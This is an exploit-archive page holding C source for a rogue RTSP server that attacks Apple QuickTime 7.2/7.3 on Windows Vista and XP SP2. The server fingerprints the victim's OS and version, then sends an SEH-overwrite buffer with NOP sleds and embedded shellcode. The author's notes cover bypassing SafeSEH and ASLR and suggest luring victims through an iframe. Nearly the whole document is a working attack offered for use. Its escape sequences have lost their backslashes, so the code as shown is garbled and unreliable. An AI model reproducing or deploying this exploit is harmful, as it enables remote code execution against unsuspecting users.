[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Apple QuickTime 7.2/7.3 RSTP Response Code Exec Exploit (Vista/XP)
# Published : 2007-11-24
# Author : InTeL
# Previous Title : Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)
# Next Title : Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)
/*
=============================================================
Apple Quicktime (Vista/XP RSTP Response) Remote Code Exec
=============================================================
Discovered by: h07
Author: InTeL
*Tested on:
- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec
- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec
- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
Notes:
[*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :)
[*]All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules, that is how u bypass the SEH
Restrictions in XP and in Vista!! so we use Addys from there.
[*]There are ALOT of filtered characters so choose your shellcode wisely or you will run into Access Violations
Since I didnt feel like wasting my time going through all the filtered Characters, go through it yourself.
- Here are some x4b, x59, x79
[*]I did hit my shellcode but b/c i havent gone through all the filtered characters i got an Access Violation
in the shellcode
[*]Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs
[***]Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit.
http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html
cough use w/ an iframe cough
Shoutz: UIA, u kno who u ppl are
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"wsock32.lib")
int info();
#define port 554
char header_part1[] =
"RTSP/1.0 200 OKrn"
"CSeq: 1rn"
"Date: 0x00 :Prn"
"Content-Base: rtsp://0.0.0.0/1.mp3/rn"
"Content-Type: ";
char header_part2[] =
"Content-Length: ";
char body[] =
"v=0rn"
"o=- 16689332712 1 IN IP4 0.0.0.0rn"
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploitrn"
"i=1.mp3rn" "t=0 0rn"
"a=tool:ciamciaramciarn"
"a=type:broadcastrn"
"a=control:*rn"
"a=range:npt=0-213.077rn"
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit rn"
"a=x-qt-text-inf:1.mp3rn"
"m=audio 0 RTP/AVP 14rn"
"c=IN IP4 0.0.0.0rn"
"a=control:track1rn";
//Place Your Shellcode here but keep the name
char scode[] =
"xfcxbbx9ax15x38x92xebx0cx5ex56x31x1exadx01xc3x85"
"xc0x75xf7xc3xe8xefxffxffxffx66xfdx7cx92x96xfexf7"
"xd7xaax75x7bxddxaax88x6bx56x05x93xf8x36xb9xa2x15"
"x81x32x90x62x13xaaxe8xb4x8dx9ex8fxf5xdaxd9x4ex3f"
"x2fxe4x92x2bxc4xddx46x88x21x54x82x5bx76xb2x4dxb7"
"xefx31x41x0cx7bx1ax46x93x90x2fx6ax18x67xc4x1ax42"
"x4cx1exdex4ax4cx7ax6bxecx7cx07xabx95x70x8cx6cx6a"
"x02xe2x70xdfx9fx6ax81xf4xa9xe1x11xbaxaaxf5x11x30"
"xc2xc9x4ex77xe5x51x27xfexf1x12x07x7bx52x7cx78xf6"
"x56x23x10x9fxa9x51xeexc8xaax82x9dx93x33x29x06x35"
"xc8x9fxa3xbdx55xdfx2bx3ex96xdfx2bx3ex96";
int main(int argc, char *argv[])
{
char evilbuf[5200], recvbuf[512];
char *strptr = NULL;
char contentlength[] = "327";
int i, pos;
struct sockaddr_in saddr;
WSADATA wsaData;
SOCKET sock, vicsock;
info();
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
printf("Unable to initialize Winsock n");
exit(1);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
printf("Socket Error n");
WSACleanup();
exit(1);
}
memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = INADDR_ANY;
saddr.sin_port = htons(port);
if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
printf("Bind Error rn");
closesocket(sock);
WSACleanup();
exit(1);
}
if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) {
printf("Listen Error rn");
closesocket(sock);
WSACleanup();
exit(1);
}
printf("[+] Listening on port: %drn", port);
if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) {
printf("[+]Victim Connected rn");
memset(recvbuf,0,sizeof(recvbuf));
recv(vicsock, recvbuf, 512, 0);
memset(evilbuf, '�', sizeof(evilbuf));
strcpy(evilbuf, header_part1);
/*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/
if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista
strptr = NULL;
if((strptr =strstr(recvbuf, "7.3")) != NULL) {
printf("Victim is running Vista and QKTime Version 7.3rn");
pos = strlen(header_part1);
for(i = 1; i<=991;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "xebx32x90x90");
strcat(evilbuf, "x54x49x64x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
else {
strptr = NULL;
if((strptr =strstr(recvbuf, "7.2")) != NULL) {
printf("Victim is running Vista and QKTime Version 7.2rn");
pos = strlen(header_part1);
for(i = 1; i<=987;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "xebx32x90x90");
strcat(evilbuf, "xb4x45x59x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
}
}
else { //Win XP SP2
strptr = NULL;
if((strptr = strstr(recvbuf, "5.1")) != NULL) {
strptr = NULL;
if((strptr =strstr(recvbuf, "Pack 2")) != NULL) {
strptr = NULL;
if((strptr =strstr(recvbuf, "7.3")) != NULL) {
printf("Victim is running XP SP2 and QKTime Version 7.3rn");
pos = strlen(header_part1);
for(i = 1; i<=991;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "xebx32x90x90");
strcat(evilbuf, "x54x49x64x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
else{
strptr = NULL;
if((strptr =strstr(recvbuf, "7.2")) != NULL) {
printf("Victim is running XP SP2 and QKTime Version 7.2rn");
pos = strlen(header_part1);
for(i = 1; i<=987;i++) {
evilbuf[pos] = 'A';
pos++;
}
strcat(evilbuf, "xebx32x90x90");
strcat(evilbuf, "xb4x45x59x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
pos += 8;
}
}
}
}
else {
printf("[-] Not a Valid Target, Shutting Down");
closesocket(vicsock);
closesocket(sock);
WSACleanup();
exit(1);
}
}
for(i=0; i<200;i++) {
evilbuf[pos] = 'x90';
pos++;
}
for(i=0; i<strlen(scode);i++){
evilbuf[pos] = scode[i];
pos++;
}
int rest = 4096-(200+strlen(scode));
for(i=0; i<rest;i++) {
evilbuf[pos] = 'x90';
pos++;
}
strcat(evilbuf, "rn");
pos +=2;
for(i = 0; i<sizeof(header_part2);i++) {
evilbuf[pos] = header_part2[i];
pos++;
}
strcat(evilbuf, contentlength);
strcat(evilbuf, "rn");
Sleep(1);
strcat(evilbuf, "rn");
pos +=8;
strcat(evilbuf, body);
printf("%s", evilbuf);
printf("[+] Evil Packet Generated rn");
if(send(vicsock, evilbuf, strlen(evilbuf), 0) != SOCKET_ERROR)
printf("[+] Evil Packet Sent rn");
else
printf("[-] Evil Packet Sending Failed rn");
closesocket(vicsock);
closesocket(sock);
WSACleanup();
}
else {
printf("Accept failed");
closesocket(sock);
WSACleanup();
}
return 0;
}
int info()
{
printf("[+]Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploitrn");
printf("[+]Author: InTeLrn");
printf("[+]Tested on:rnt- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Execrnt- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Execrnt- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Execrnt- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Execrn");
printf("[+]Shout to: UIA, you kno who u ppl arernrn");
return 0;
}
// www.Syue.com [2007-11-24]